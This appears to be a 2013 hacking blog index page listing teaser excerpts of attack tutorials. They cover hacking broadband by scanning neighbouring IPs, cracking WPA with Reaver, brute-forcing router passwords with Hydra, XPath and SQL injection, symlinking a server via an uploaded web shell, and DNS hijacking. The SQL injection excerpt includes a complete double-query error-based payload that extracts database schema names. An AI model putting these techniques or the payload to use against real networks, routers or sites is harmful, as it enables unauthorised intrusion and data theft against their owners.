Saturday, March 30, 2013

How to hack Broadband


Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range

Read more…

Double query Sql Injection


Database :::
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Read more…

How to crack WPA networks with Reaver


1. Boot into BackTrack mode. Place your pre-made BackTrack Live DVD into your DVD drive. When BackTrack prompts you to choose from a selection of boot modes, choose “BackTrack Text – Default Boot Text Mode” and hit Enter. After a while, BackTrack will take you to the command line prompt. At the command line prompt, type startx and hit Enter. You will then be taken into a graphical UI of BackTrack.

Read more…

XPath injection


The XPath attack
Generally, most Web applications use relational databases to store and retrieve information. For example, if you have a Web site that requires authentication, you might have a table called users with a unique ID, a login name, a password, and perhaps some other sort of information like a role. A SQL query to retrieve a user from a users table might look like Listing 1.

Read more…

Blind & Classic SQL Injection




In this tutorial i will describe how sql injection works and how to use it to get some useful information.
First of all: What is SQL injection? It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential information etc...(in shortly).
1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part) So let's start with some action
1). Check for vulnerability Let's say that we have some site like this

Read more…

How to Hack Wireless Router Passwords & Networks Using Hydra


Step 1 Download & Install Hydra
First we need to go to the Hydra website, download Hyrda, and get everything configured. In this article, a "cmd" refers to a command that has to be entered into a terminal emulator.
  1. Download Hydra from THC's website.
  2. Extract Hydra in a nice location.

Read more…

How To Symlink a Server


1 .we have a shell in a linux server and is Safe Mode OFF , if its not off Off put the file php.ini , and Disable Functions : None

Code:

http://www.website.com/shell.php
 
and directory :

/home/ueb/public_html/

Read more…

DNS Hijacking


This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)

Read more…